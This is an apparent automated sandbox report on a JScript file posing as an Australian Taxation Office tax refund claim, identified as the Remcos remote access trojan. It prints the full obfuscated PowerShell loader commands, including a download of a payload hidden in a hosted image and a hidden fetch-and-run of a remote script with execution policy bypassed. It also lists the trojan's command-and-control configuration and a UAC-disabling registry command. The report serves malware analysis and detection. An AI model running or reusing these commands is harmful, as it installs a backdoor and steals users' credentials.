Edit tour

Windows Analysis Report
Tax_Refund_Claim_2024_Australian_Taxation_Office.js

Overview

General Information

Sample name:	Tax_Refund_Claim_2024_Australian_Taxation_Office.js
Analysis ID:	1584330
MD5:	a99ac2b0c9df4fc8b76f1c96bfce311c
SHA1:	3cbdd7d89a4d57005496a40cf1bf9a43e41f2635
SHA256:	496328b2630e631422e0e62da0ca876b54801a963c8e71ad79c0c4e20165999c
Tags:	jsuser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Contains functionality to bypass UAC (CMSTPLUA)

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Sigma detected: Powershell download and load assembly

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Creates autostart registry keys with suspicious values (likely registry only malware)

Delayed program exit found

Injects a PE file into a foreign processes

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Silenttrinity Stager Msbuild Activity

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7296 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tax_Refund_Claim_2024_Australian_Taxation_Office.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 7356 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() | ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7740 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7912 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

chrome.exe (PID: 8092 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

MSBuild.exe (PID: 8152 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\yqrnzxuewrllgkpigkbsooiasehxvvunub" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 8160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\akwgap" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 8184 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\lmkqsiyzy" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 600 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\lmkqsiyzy" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

msedge.exe (PID: 7376 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5252 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2656 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6484 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3796 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6796 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

powershell.exe (PID: 7796 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 3652 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\smudgy.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 6036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLbCTNCSacaUBlznKdLL = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$BAKhKaLKKhUzWAiLoPeT = New-Object System.Net.WebClient;$CUcWoiOZbZlLkKfkLNKn = $BAKhKaLKKhUzWAiLoPeT.DownloadData($iLbCTNCSacaUBlznKdLL);$hnbcLZWZIRphWirWbKoP = [System.Text.Encoding]::UTF8.GetString($CUcWoiOZbZlLkKfkLNKn);$WdhGWGnCuzIoSWNGzakW = '<<BASE64_START>>';$IiaPzGlWLWAWULkdGasx = '<<BASE64_END>>';$oiGGvTReStQZLhKLLBWJ = $hnbcLZWZIRphWirWbKoP.IndexOf($WdhGWGnCuzIoSWNGzakW);$LcWLWIWLKiPfApOLgbhR = $hnbcLZWZIRphWirWbKoP.IndexOf($IiaPzGlWLWAWULkdGasx);$oiGGvTReStQZLhKLLBWJ -ge 0 -and $LcWLWIWLKiPfApOLgbhR -gt $oiGGvTReStQZLhKLLBWJ;$oiGGvTReStQZLhKLLBWJ += $WdhGWGnCuzIoSWNGzakW.Length;$khUWOGOLPuNkKWuNlJGL = $LcWLWIWLKiPfApOLgbhR - $oiGGvTReStQZLhKLLBWJ;$vZCZRhsdWpmjLCUemdQR = $hnbcLZWZIRphWirWbKoP.Substring($oiGGvTReStQZLhKLLBWJ, $khUWOGOLPuNkKWuNlJGL);$sHPbLeLWLSAKZkdaLmxt = -join ($vZCZRhsdWpmjLCUemdQR.ToCharArray() | ForEach-Object { $_ })[-1..-($vZCZRhsdWpmjLCUemdQR.Length)];$AlkLoWLeqkLxkmviBqWi = [System.Convert]::FromBase64String($sHPbLeLWLSAKZkdaLmxt);$WxLPHeKiGUInbiBzcbRa = [System.Reflection.Assembly]::Load($AlkLoWLeqkLxkmviBqWi);$OLiclpBLBaWWdiULbLvU = [dnlib.IO.Home].GetMethod('VAI');$OLiclpBLBaWWdiULbLvU.Invoke($null, @($restoredText, 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'MSBuild', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','1','kSUPzeWAKqsWhWRWCogL','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 8796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 8804 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

svchost.exe (PID: 7556 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["195.133.78.18:7346:1"], "Assigned name": "chesguyce", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "fyhstga-ONSWMZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
0000001B.00000002.2449621046.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 7356	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1a5e6:$b2: ::FromBase64String( 0x1aed1:$b2: ::FromBase64String( 0x4f298:$b2: ::FromBase64String( 0x4fe15:$b2: ::FromBase64String( 0x113a88:$b2: ::FromBase64String( 0x1143b4:$b2: ::FromBase64String( 0x121369:$b2: ::FromBase64String( 0x121c95:$b2: ::FromBase64String( 0x123493:$b2: ::FromBase64String( 0x125643:$b2: ::FromBase64String( 0x12fc33:$b2: ::FromBase64String( 0x138091:$b2: ::FromBase64String( 0x1a2f4:$b3: ::UTF8.GetString( 0x1abdf:$b3: ::UTF8.GetString( 0x4efa6:$b3: ::UTF8.GetString( 0x4fb23:$b3: ::UTF8.GetString( 0x113796:$b3: ::UTF8.GetString( 0x1140c2:$b3: ::UTF8.GetString( 0x121077:$b3: ::UTF8.GetString( 0x1219a3:$b3: ::UTF8.GetString( 0x1231a1:$b3: ::UTF8.GetString(
Process Memory Space: MSBuild.exe PID: 8804	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: MSBuild.exe PID: 8804	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 8804	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: MSBuild.exe PID: 8804	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x8dda:$a1: Remcos restarted by watchdog! 0x9337:$a3: %02i:%02i:%02i:%03i 0x96ef:$a3: %02i:%02i:%02i:%03i
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
27.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
27.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
27.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
27.2.MSBuild.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
27.2.MSBuild.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
27.2.MSBuild.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
27.2.MSBuild.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
27.2.MSBuild.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
27.2.MSBuild.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
27.2.MSBuild.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
27.2.MSBuild.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
27.2.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() | ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { 